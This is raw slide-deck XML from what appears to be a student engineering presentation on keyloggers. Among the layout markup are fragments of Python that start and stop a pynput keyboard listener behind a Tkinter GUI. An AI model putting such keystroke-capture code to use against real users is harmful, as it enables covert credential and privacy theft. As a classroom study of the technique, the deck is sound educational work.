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23" r:id="rId3"/>
    <p:sldId id="324" r:id="rId4"/>
    <p:sldId id="325" r:id="rId5"/>
    <p:sldId id="326" r:id="rId6"/>
    <p:sldId id="327" r:id="rId7"/>
    <p:sldId id="328" r:id="rId8"/>
    <p:sldId id="329" r:id="rId9"/>
    <p:sldId id="330" r:id="rId10"/>
    <p:sldId id="331" r:id="rId11"/>
    <p:sldId id="332" r:id="rId12"/>
    <p:sldId id="334" r:id="rId13"/>
    <p:sldId id="335" r:id="rId14"/>
    <p:sldId id="336" r:id="rId15"/>
    <p:sldId id="337" r:id="rId16"/>
    <p:sldId id="338" r:id="rId17"/>
    <p:sldId id="339" r:id="rId18"/>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7" d="100"/>
          <a:sy n="77"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3" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104873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3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3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4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr altLang="en-US" sz="1200" lang="zh-CN">
              <a:latin typeface="Calibri" pitchFamily="0" charset="0"/>
              <a:ea typeface="等线" pitchFamily="0" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104873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3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3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2" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048623" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104862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0" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048651" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104865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4" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048655" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104865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8" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048659" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104866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3" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks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8" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048669" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104867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3" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048674" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104867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4" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks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文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048602" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104860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文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048592" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104859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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048597" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104859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文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048608" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104860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文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048628" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104862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2" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048633" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104863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8" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks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4" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048645" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104864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45" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048610" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="446534" y="457200"/>
            <a:ext cx="3703319" cy="94997"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="465359"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048611" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8042147" y="453643"/>
            <a:ext cx="3703319" cy="98554"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048612"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13" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="446534" y="3085764"/>
            <a:ext cx="11298933" cy="3338149"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="465359"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048614"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616"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4/4/2024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617"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618"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0" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048716" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr altLang="en-US" lang="zh-CN" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104871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4" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104869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9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88"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79" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048676" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="446534" y="457200"/>
            <a:ext cx="3703319" cy="94997"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="465359"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048677" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8042147" y="453643"/>
            <a:ext cx="3703319" cy="98554"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048678" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4241830" y="457200"/>
            <a:ext cx="3703319" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097160"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7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8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8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8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9" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048712" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr altLang="en-US" lang="zh-CN" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104871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6" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104869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0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1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048720" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr altLang="en-US" lang="zh-CN" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104872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7" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048703" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr altLang="en-US" lang="zh-CN" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104870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3" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048687" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr altLang="en-US" lang="zh-CN" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</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8" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10487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2" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104872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5" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104869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9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4/4/2024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19" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1359107" y="1821635"/>
            <a:ext cx="9144000" cy="977778"/>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keyloggers</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620" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="-329782" y="1034320"/>
            <a:ext cx="12726648" cy="577215"/>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621" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3117529" y="4586365"/>
            <a:ext cx="7980183" cy="681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0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented By:</a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" baseline="0" b="1" cap="none" sz="2000" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>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000" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</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g</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u</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sthian</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D</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-DMI COLLEGE </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O</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" baseline="0" b="1" cap="none" sz="2000" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>F ENGINEERING -IT(DEPT)</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" baseline="0" b="1" cap="none" sz="2000" i="0" kern="1200" lang="zh-CN" spc="0" strike="noStrike" u="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>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47"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48"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9" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320"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listener</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listener =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keyboard.Listener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listener.start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label.config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start_button.config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(state='disabled')</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stop_button.config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(state='normal')</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stop_keylogger</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listener</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listener.stop</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label.config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(text="Keylogger stopped.")</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start_button</a:t>
            </a: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53"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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097157" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991267" cy="3419952"/>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57"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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097158" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="904352" y="1692539"/>
            <a:ext cx="7487694" cy="752580"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097159" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="720801" y="3458123"/>
            <a:ext cx="11250407" cy="1563407"/>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6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62" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="901232" y="0"/>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000" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">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66"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943" marL="305943">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" baseline="0" b="1" cap="none" sz="1700" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">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altLang="zh-CN" baseline="0" b="1"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67"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67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7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404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" baseline="0" b="0" cap="none" sz="2400" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" baseline="0" b="0" cap="none" sz="2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68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599"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0" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
